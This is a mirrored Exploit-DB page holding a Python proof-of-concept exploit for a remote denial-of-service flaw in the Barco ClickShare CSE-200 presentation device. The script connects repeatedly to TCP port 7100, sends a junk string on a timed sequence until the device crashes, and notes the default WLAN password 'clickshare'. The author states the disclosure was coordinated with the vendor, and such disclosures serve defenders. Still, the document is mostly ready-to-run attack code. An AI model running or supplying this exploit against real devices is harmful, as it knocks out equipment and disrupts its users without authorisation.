Barco ClickShare CSE-200 – Remote Denial of Service - 体验盒子

作者： Florian Hauser

日期： 2018-04-16

类别：

dos

平台：

hardware

来源：https://www.exploit-db.com/exploits/44456/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

#!/usr/bin/python

# Exploit Title: Barco ClickShare CSE-200 - Remote Denial of Service

# Date: 11-04-2018

# Hardware Link: https://www.barco.com/de/product/clickshare-cse-200

# Exploit Author: Florian Hauser

# Contact: florian DOT g DOT hauser AT gmail DOT com

# CVE: requested by Barco

# Category: Hardware

#Disclaimer:

#This or previous programs is for Educational

#purpose ONLY. Do not use it without permission.

#The usual disclaimer applies, especially the

#fact that Florian Hauser is not liable for any

#damages caused by direct or indirect use of the

#information or functionality provided by these

#programs. The author or any Internet provider

#bears NO responsibility for content or misuse

#of these programs or any derivatives thereof.

#By using these programs you accept the fact

#that any damage (dataloss, system crash,

#system compromise, etc.) caused by the use

#of these programs is not Florian Hauser's

#responsibility.

#

#Use them at your own risk!

################

# Vulnerability description (you have to be connected to the ClickShare WLAN for that, standard password is 'clickshare'):

# Sending arbitrary unexpected string to TCP port 7100 with respect to -> a certain time sequence <-

# not only disconnects all clients but also results in a crash of this hardware device

# Recover: Switch energy supply off for several minutes and reboot the system. Patches will be delivered in July 2018.

# I got permission from Barco to disclose this vulnerability.

# This affects potentially all other ClickShare products, Barco confirms

import socket

import sys

from time import sleep

if len(sys.argv) != 2:

print "Usage: exploit.py <ip>"

sys.exit(0)

# Sending random string until crash occurs. Max. of 50 seems definitely sufficient for that.

# 6-7 requests do the job usually

for x in range(1,50):

#Create a new socket each time because otherwise the service drops the socket

#Same request cannot be sent several times in sequence

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

#Connect to vulnerable TCP port 7100

connect=s.connect((str(sys.argv[1]), 7100))

s.send('some evil string \r\n\n')

print "Buffer " + str(x) + " sent...\n"

result=s.recv(1024)

print result

s.close()

#Sleep for a few seconds because otherwise the service denies a socket creation but does not crash

sleep(7)